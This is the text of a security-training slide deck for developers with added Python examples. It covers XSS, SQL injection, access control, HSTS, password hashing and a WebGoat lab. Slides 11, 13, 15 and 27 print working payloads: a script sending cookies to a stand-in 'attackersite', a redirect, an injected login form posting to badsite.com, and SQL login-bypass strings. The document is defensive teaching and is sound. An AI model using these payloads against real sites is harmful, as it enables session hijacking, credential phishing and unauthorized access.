Devbeat Conference - Developer First Security

Topics include:

- Sample and Demo of Top Application Risks: Cross Site Scripting, SQL Injection, Access Control
- Who's Monitoring Your Traffic? Encrypting in Transit
- Secure Data Storage & Protection: Correct Password Storage & Data Protection
- Growing Threats Plaguing Applications


  1. Developer-first security: Integrating Security into Development. Michael Coates, michael@ShapeSecurity.com, michael-coates.blogspot.com, @_mwc
  2. About Me: michael@shapesecurity.com
  3. Reality
  4. "The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine"
     http://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking
     http://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
  5. Data Loss & Breaches (sources: datalossdb.org, Verizon Data Breach Report 2013)
  6. Outside Attackers (sources: datalossdb.org, Verizon Data Breach Report 2013)
  7. Security - Into The Details
     • Sample and Demo of Top Application Risks: Cross Site Scripting, SQL Injection, Access Control
     • Who's Monitoring Your Traffic? Encrypting in Transit
     • Secure Data Storage & Protection: Correct Password Storage & Data Protection
     • Growing Threats Plaguing Applications
  8. WARNING: Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
  9. 3 Dangerous Vulnerabilities: Cross Site Scripting, SQL Injection, Access Control
  10. What are Web Requests
     • Open a console and enter the following:
       telnet google.com 80
       GET / HTTP/1.1
     • Hit return 2 times
  11. Cross Site Scripting (XSS)
     • Problem: User controlled data returned in the HTTP response contains HTML/JavaScript code
     • Impact: Session Hijacking, Full Control of Page, Malicious Redirects
     • Basic XSS Test:
       "><script>alert(document.cookie)</script>
     • Cookie Theft Example:
       "><script>document.location='http://attackersite/'+document.cookie</script>
  12. XSS Behind The Scenes
     Request: http://shinypage.com?user=Bob
     JSP Code: <h1>Glad to see you <%= request.getParameter("name") %></h1>
     HTML Source / Rendered HTML: <div>Glad to see you <b>Bob</b></div>
  13. XSS Behind The Scenes
     Request: http://shinypage.com?user=friend</b>
       <br><form method="post" action="badsite.com/login">
       Login: <input type="text" name="username"><br>
       Password:<input type="password" name="password">
       <input type="submit" value="Submit" /></form>
  14. XSS - Injecting HTML (Rendered HTML)
  15. Cross Site Scripting
     • Cross Site Scripting typically uses JavaScript to do bad things
     • Steal session cookies: <script>alert(document.cookie)</script>
     • Redirect to bad pages: <script>window.location = "http://evilsite.com/"</script>
     • Rewrite page on the fly
  16. Lab! - Reflected XSS
  17. Reflected XSS Lab
     • Lesson: Cross-Site Scripting -> Reflected XSS Attacks
     • Proxy Not Needed
  18. Lab! - Stored XSS
  19. Stored XSS Lab
     • Lesson: Cross-Site Scripting -> Stored XSS Attacks
     • Proxy Not Needed
  20. XSS Prevention
     • Solution
       1. Output Encoding - converts command characters to benign characters for display
       2. Input Validation
     <h1>Glad to see you <%= encodeForHTML( request.getParameter("name") ) %></h1>
     HTML Encoding: < becomes &lt;, > becomes &gt;, " becomes &quot;, ' becomes &#x27;, & becomes &amp;
  21. XSS Attempt Revisited
     Request: http://shinypage.com?user=friend</b>
       <br><form method="post" action="badsite.com/login">
       Login: <input type="text" name="username"><br>
       Password:<input type="password" name="password">
       <input type="submit" value="Submit" /></form>
  22. Safe Handling
     Rendered HTML (with output encoding the injected markup is displayed as text, not interpreted): Glad to see you friend</b>
       <br><form method="post" action="badsite.com/login">
       Login: <input type="text" name="username"><br>
       Password:<input type="password" name="password">
       <input type="submit" value="Submit" /></form>
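The output-encoding fix from slides 20 to 22, carried through in code. This is an added example, not the presenter's JSP; it reproduces the slide 12 greeting in Python, applies the same entity encoding with the standard library's html.escape (so encodeForHTML is a stand-in, not a real JSP function), and includes a small checker that lists any tag left live in the greeting. The injected "user" value is the one from slide 13, embedded as constructed sample input.

```python
import html
import re

# Constructed sample input: the injected "user" value shown on slides 13 and 21.
INJECTED_NAME = (
    'friend</b><br><form method="post" action="badsite.com/login">'
    'Login: <input type="text" name="username"><br>'
    'Password:<input type="password" name="password">'
    '<input type="submit" value="Submit" /></form>'
)


def render_unsafe(name):
    """Mirrors the vulnerable JSP on slide 12: the parameter is dropped straight into the page."""
    return "<h1>Glad to see you " + name + "</h1>"


def encode_for_html(value):
    """Output encoding: < > & " ' become entities, so the browser displays them as text."""
    return html.escape(value, quote=True)


def render_safe(name):
    """The fixed JSP on slide 20: encode at the point of output."""
    return "<h1>Glad to see you " + encode_for_html(name) + "</h1>"


# Tags an attacker-controlled value could smuggle into the greeting (the ones used on the slides).
TAG = re.compile(r"<(/?)(form|input|script|b|br)\b", re.IGNORECASE)


def injected_tags(page):
    """List every HTML tag found inside the greeting, i.e. markup the browser would interpret."""
    prefix, suffix = "<h1>Glad to see you ", "</h1>"
    body = page[len(prefix):len(page) - len(suffix)]
    return [m.group(0) for m in TAG.finditer(body)]


if __name__ == "__main__":
    print(render_unsafe(INJECTED_NAME))
    print(injected_tags(render_unsafe(INJECTED_NAME)))  # the injected form and inputs are live markup
    print(render_safe(INJECTED_NAME))
    print(injected_tags(render_safe(INJECTED_NAME)))    # [] - nothing left for the browser to execute
```

html.escape with quote=True encodes exactly the five characters in the slide 20 table, which is why the safe rendering contains no `<` at all and the checker finds nothing.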
  23. XSS Resources
     • OWASP XSS Prevention Cheat Sheet - http://bit.ly/XSS-OWASP
     • Content Security Policy - http://bit.ly/CSP-OWASP
     • OWASP XSS Overview - http://bit.ly/OWASPXSS
  24. SQL Injection
     • Problem: User controlled data improperly used with SQL statements
     • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
     • Basic SQL Injection Tests:
       OR 1=1 --
       ' OR '1'='1'--
     • Example Vulnerable Query (built by string concatenation):
       sqlQ = "Select user from UserTable where name='" + username + "' and pass='" + password + "'"
  25. Lab! - SQL Lesson
  26. SQL Injection
     • Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection
     • Proxy Needed
     • Objective: Bypass the login page by inserting "control" characters. Login as "Neville" without knowledge of the password
  27. SQL Injection
     • HTTP Post: employee_id=112&password=x' OR '1'='1&action=Login
     • Vulnerable SQL: "Select user from UserTable where name='" + username + "' and pass='" + password + "'"
     • Resulting Statement: Select user from UserTable where name='112' and pass='x' OR '1'='1'
     • Result: ... name='112' and pass='x' OR TRUE
  28. SQL Injection
     • Parameterized Queries
       No confusion with control characters
       Example: would look for a password of ' OR '1'='1
     • Input Validation
       Are special characters needed for most fields?
       What about non-printable characters %00-%0A?
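Slides 24, 27 and 28 side by side: the concatenated query, the parameterized query, and the input validation question. This is an added example, not the lab's code. It uses Python's sqlite3 module against an in-memory table with constructed rows (the names, ids and passwords are made up) and feeds both query styles the exact password value from the slide 27 POST body, so the difference in outcome is visible on the same input.

```python
import re
import sqlite3


def make_db():
    """Constructed sample UserTable (hypothetical rows, not the lab's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserTable (user TEXT, name TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO UserTable VALUES (?, ?, ?)",
        [("Neville", "112", "correct-horse-battery"), ("Tom", "105", "tom-secret")],
    )
    return conn


def login_concat(conn, username, password):
    """Vulnerable form from slide 24: user input is spliced into the SQL text."""
    sqlq = ("Select user from UserTable where name='" + username +
            "' and pass='" + password + "'")
    return [row[0] for row in conn.execute(sqlq)]


def login_param(conn, username, password):
    """Fixed form from slide 28: placeholders keep the statement structure fixed;
    the driver passes the values separately, so quotes inside them are just data."""
    sqlq = "Select user from UserTable where name=? and pass=?"
    return [row[0] for row in conn.execute(sqlq, (username, password))]


EMPLOYEE_ID = re.compile(r"[0-9]{1,10}")


def valid_employee_id(value):
    """Input validation (slide 28): an employee id needs digits only, so quotes and
    non-printable characters (0x00-0x0A) are rejected before any query is built."""
    return EMPLOYEE_ID.fullmatch(value) is not None


INJECTED_PASSWORD = "x' OR '1'='1"   # the password field from the slide 27 POST body

if __name__ == "__main__":
    conn = make_db()
    # Every user comes back: OR '1'='1' made the WHERE clause true for all rows.
    print(login_concat(conn, "112", INJECTED_PASSWORD))
    # Nothing comes back: the driver looked for a password literally equal to x' OR '1'='1.
    print(login_param(conn, "112", INJECTED_PASSWORD))
    print(login_param(conn, "112", "correct-horse-battery"))
    print(valid_employee_id("112"), valid_employee_id("112\x00"))
```

Parameterization is the control that actually removes the bug; the validation function is the defence-in-depth layer the slide asks about, useful because a numeric field has no legitimate reason to carry quotes or control characters.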

  29. SQL Injection Resources
     • https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
  30. Access Control
     • Problem: Developers assume some parts of the app can't be seen, tampered with or invoked by the user
     • Impact: Unauthorized data access, access to privileged functionality
     • Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments
     • Access Control Failure Example:
       http://somebadbank.com/showacct?id=101
       http://somebadbank.com/showacct?id=102

  31. Lab! - Access Control
  32. Access Control Violation
     • Lesson: Access Control Flaws -> LAB: Role Based Access Control -> Stage 1: Bypass Business Layer Access Control
     • Proxy Needed
     • Objective: Find a way to execute "delete" functionality using Tom's account. Delete account "tom"
  33. Access Control Violation
     • Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how the action name is sent to the server:
       POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1
       Host: localhost

       employee_id=105&action=ViewProfile
  34. Strong Access Controls
     • Access Control Performed Server Side
     • Never Relies Upon "Security by Obscurity"
     • Be Careful with Identifiers (e.g. id=123)
     • Attacker Can Send Anything in Request
     • Presentation Layer Controls Can Not Enforce Access Control
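The two failures the slides describe (the bank's guessable id=101/102 on slide 30 and the action name carried in the POST body on slide 33) and the server-side checks slide 34 calls for, as an added example. This is not code from the slides or from WebGoat; the accounts, users, roles and action names are constructed for illustration, and the ACCOUNTS, ROLES and ALLOWED tables stand in for whatever store a real application would consult.

```python
# Constructed sample data for illustration only (hypothetical accounts, users and roles;
# not the bank or the WebGoat lab referenced on the slides).
ACCOUNTS = {
    101: {"owner": "alice", "balance": 250},
    102: {"owner": "bob", "balance": 990},
}
ROLES = {"alice": "customer", "bob": "customer", "tom": "staff", "jerry": "admin"}
# Which roles may invoke which action. The server consults this table, never the UI.
ALLOWED = {
    "SearchStaff": {"staff", "admin"},
    "ViewProfile": {"staff", "admin"},
    "DeleteProfile": {"admin"},
}


class Forbidden(Exception):
    """Raised when the authenticated user is not entitled to the requested resource or action."""


def show_account_broken(session_user, account_id):
    """Slide 30's failure: whatever id the request carries is served (id=101, id=102, ...)."""
    return ACCOUNTS[account_id]


def show_account(session_user, account_id):
    """Server-side check: the record must belong to the user the session was issued to."""
    acct = ACCOUNTS.get(account_id)
    if acct is None or acct["owner"] != session_user:
        raise Forbidden("%s may not view account %s" % (session_user, account_id))
    return acct


def perform_action(session_user, action):
    """Hiding a button is not access control: the action name arrives in the POST body
    (action=ViewProfile on slide 33) and anything can be sent there, so the role check
    happens here, on the server, for every request."""
    role = ROLES.get(session_user)
    if role is None or role not in ALLOWED.get(action, set()):
        raise Forbidden("%s (%s) may not invoke %s" % (session_user, role, action))
    return "%s executed by %s" % (action, session_user)


if __name__ == "__main__":
    print(show_account("alice", 101))
    for call in (lambda: show_account("alice", 102),
                 lambda: perform_action("tom", "DeleteProfile")):
        try:
            call()
        except Forbidden as err:
            print("denied:", err)
```

Two details worth copying: an unknown action or unknown user falls into the deny branch rather than a KeyError, and the ownership test compares against the session identity, not against anything the client sent.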
  35. Access Control Resources
     • https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
  36. Who's Monitoring Your Traffic?
  37. Insecure Session Management
     • Secure login over HTTPS (https://site.com/login)
     • Password submitted encrypted
     • Immediate redirect to HTTP (http://site.com/profile)
     • Session ID sent cleartext <-- vulnerability point
  38. Vulnerable Redirects
     • User requests HTTP page, response redirects to HTTPS
     • 302 Response is HTTP <-- Vulnerability Point
  39. Secure Design for Communication
     • Use HTTPS Throughout Web Site!
     • HTTP Strict Transport Security (HSTS)!
       • Opt-in security control
       • Website instructs compatible browser to enable STS for site
       • HSTS Forces (for enabled site):
         • All communication over HTTPS
         • No insecure HTTP requests sent from browser
         • No option for user to override untrusted certificates
  40. Strict Transport Security
     • Browser prevents HTTP requests to HSTS site
     • Any request to site is "upgraded" to HTTPS
     • No clear text HTTP traffic ever sent to HSTS site
     • Browser assumes HTTPS for HSTS sites
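A small model of the browser-side behaviour slides 39 and 40 describe, as an added example (not the presenter's code, and not a real browser implementation). It parses the Strict-Transport-Security header as defined in RFC 6797, keeps a host list, and rewrites later http:// requests to https:// before they would leave the browser. It also shows two rules of the RFC that matter for the slide 37 and 38 scenarios: a policy is only learned from a response received over HTTPS, and the redirect target http://site.com/profile is upgraded rather than fetched in clear. The URLs and header values are constructed sample data.

```python
from urllib.parse import urlsplit, urlunsplit


def parse_hsts(header_value):
    """Parse a Strict-Transport-Security value (RFC 6797), e.g. 'max-age=31536000; includeSubDomains'.
    Returns (max_age_seconds or None, include_subdomains)."""
    max_age, include_sub = None, False
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                max_age = int(value.strip().strip('"'))
            except ValueError:
                return None, False        # malformed header: policy ignored
        elif name == "includesubdomains":
            include_sub = True
    return max_age, include_sub


class HstsCache:
    """Minimal model of a browser's STS host list: learn policy from responses, upgrade later requests."""

    def __init__(self):
        self.hosts = {}                   # host -> include_subdomains

    def observe(self, url, headers):
        """Record the policy from a response. Only an HTTPS response may set it;
        a header seen over plain HTTP could have been injected on the wire and is ignored."""
        parts = urlsplit(url)
        value = headers.get("Strict-Transport-Security")
        if parts.scheme != "https" or value is None:
            return
        max_age, include_sub = parse_hsts(value)
        if max_age is None:
            return
        if max_age == 0:
            self.hosts.pop(parts.hostname, None)   # the site withdrew its policy
        else:
            self.hosts[parts.hostname] = include_sub

    def is_known(self, host):
        for known, include_sub in self.hosts.items():
            if host == known or (include_sub and host.endswith("." + known)):
                return True
        return False

    def rewrite(self, url):
        """Slide 40: an http:// request to a known host is upgraded before anything leaves the browser."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self.is_known(parts.hostname):
            return urlunsplit(("https", parts.netloc, parts.path, parts.query, parts.fragment))
        return url


if __name__ == "__main__":
    browser = HstsCache()
    # Constructed exchange: the HTTPS login response sets the policy, so the slide 37
    # redirect target http://site.com/profile is upgraded instead of carrying the session ID in clear.
    browser.observe("https://site.com/login",
                    {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"})
    print(browser.rewrite("http://site.com/profile"))
```

The max-age is accepted but not aged out here; a real browser also expires the entry and, as slide 39 notes, refuses to let the user click through certificate errors for a known host, which this model does not cover.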
  41. Secure Data Storage & Protection
  42. Password Storage
     • Bad Approaches: Your own algorithm, md5 encryption, base64 encoding, rot 13
     • Good Approach: PBKDF2 (sha1), Bcrypt, + Per User Salt
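The "good approach" column of slide 42 in working form, as an added example that is not the presenter's code. It uses Python's standard library PBKDF2 (hashlib.pbkdf2_hmac) with a random per-user salt and a constant-time comparison on verification; SHA-256 is chosen here rather than the slide's SHA-1, which is a choice of this example, and the iteration count is an assumption to be tuned per deployment. The unsalted MD5 function is kept only to make the slide's point visible: identical passwords yield identical hashes, which is what a precomputed table exploits. The sample users and password are constructed.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 200_000   # assumption for this example; tune to your hardware and latency budget


def hash_password(password, iterations=ITERATIONS):
    """Slide 42's good approach: PBKDF2 with a fresh random per-user salt.
    Returns a self-describing string so the parameters can be raised later without a migration."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    )


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False                       # not in our format: treat as no match
    if algo != "pbkdf2_sha256":
        return False
    salt, expected = base64.b64decode(salt_b64), base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(actual, expected)


def unsalted_md5(password):
    """Slide 42's bad approach, kept only to show the problem: no salt and a fast hash,
    so equal passwords give equal hashes and one precomputed (rainbow) table cracks them all."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    # Constructed sample users that happen to share a password (hypothetical, like the slide 50 list).
    joe, sue = hash_password("password1"), hash_password("password1")
    print(joe != sue)                                              # True: different salts
    print(verify_password("password1", joe))                       # True
    print(unsalted_md5("password1") == unsalted_md5("password1"))  # True: the weakness
```

The stored string carries algorithm, iteration count and salt alongside the digest, which is what lets a deployment raise the cost factor later and re-hash users as they log in; the verifier reads the parameters from the record, never from configuration alone.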
  43. What Are We Protecting?
     Correct password hashing protects against:
     • Offline attacks of password repository
     • Brute Force, Rainbow Attacks
     Does not address:
     • Guessing easy passwords
     • Password theft, disclosure
     • Session Hijacking
     • Credential Stuffing
  44. Architecture for Sensitive Data
     [Diagram: client -> https://site.com -> web server -> internal SSL -> database; Monitor Database Queries & Response Size]
  45. Encrypting Sensitive Data in Database
     [Diagram: user data is encrypted/decrypted with a Customer/Group Encryption Key; that key is stored in the database encrypted under a Key Encrypting Key held in a Hardware Security Module]
     • Encryption within Database
     • Unique keys per data region
     • Key encrypting keys
     • Hardware Security Modules (
  46. Growing Threats Plaguing Applications
  47. Denial of Service: Denial of Service (DOS), Distributed Denial of Service (DDOS)
  48. Denial of Service
     • Network DDOS: Exhaust Network Bandwidth
     • Application Layer DDOS (e.g. site.com/generateReport): Exhaust Server CPU/Memory
  49. Application Denial of Service
     Traditional Network DDOS:
     • overwhelms target with volume
     • exhausts bandwidth / capacity of network devices
     • Requires large number of machines
     • Defenses: CDN, anti-DDOS services
     Application DDOS:
     • invokes computationally intense application functions
     • exhausts CPU / memory of web servers
     • Requires few machines
     • Defenses: Few available, must customize
  50. Credential Stuffing
     [Diagram: a compromised server leaks its credentials (joe: abc123, sue: password1, bob: MyP0n3y); the stolen credentials are then replayed against https://site.com/login (sue:password1, joe: abc123)]
  51. Take Aways
     • Understand top security threats and anticipate potential malicious use of the application to design secure code
     • Multiple controls possible to protect sensitive data in transit and storage
     • Understand emerging threats to plan for appropriate defenses
     • Use OWASP BWA Security Lab and learn more!
  52. Thanks! michael@ShapeSecurity.com http://michael-coates.blogspot.com @_mwc
  53. Virtual Security Training Lab Setup
  54. Software
     • Vulnerable Server: OWASP's WebGoat
     • Proxy Tool: OWASP's ZAP (Zed Attack Proxy)
     • Browser
     • Virtual Machine: OWASP Broken Web App VM
  55. Test Connectivity to VM
     1. Open Browser
     2. Browse to your VM ip (listed in VM login page), e.g. http://192.168.56.101
     3. Should see OWASP BWA welcome page
     4. Error? Check ip address of VM
  56. WebGoat
     • Click First Link - OWASP WebGoat version 5.3.x
     • Username / Password is guest / guest
  57. Understanding the Proxy
     • Proxy is a middle-man between browser and web server
     • Assists with traffic manipulation & inspection
     [Diagram: Attacker's Browser -> Web Proxy -> Web Server]
  58. Understanding the Proxy
     [Diagram: Your Computer (Primary OS): Browser -> Web Proxy; VM: Web Server]
  59. Enabling Proxy
     1. Open ZAP
     2. Configure Firefox to use proxy
     3. Resend Request
     4. Confirm received by proxy
     5. Forward to web server (vm)
  60. Using A Proxy
     • ZAP - Configure to listen on 8080
  61. Set Firefox Proxy
     • Set Firefox proxy to 8080: Preferences -> Advanced -> Network -> Settings
     • Set HTTP Proxy
     • Important - clear the "No Proxy for" line
  62. Confirm Setup Works
     • Refresh Web Browser
     • Go to ZAP
     • See site in left-hand column
  63. Intercepting Traffic
     • Add a "breakpoint" by right clicking on the page and choosing "Break..."
     • Refresh the webpage - it will hang
     • Modify the request as needed, then press the "Continue" button
  64. "Hello World" of Proxies
     • Lesson: General -> Http Basic
     • Objective:
       • Enter your name into text box
       • Intercept with proxy & change entered name to different value
       • Receive response & observe modified value is reversed
     [Diagram: Attacker's Browser sends "Joe"; Web Proxy changes it to "Sue"; Web Server returns "euS"]
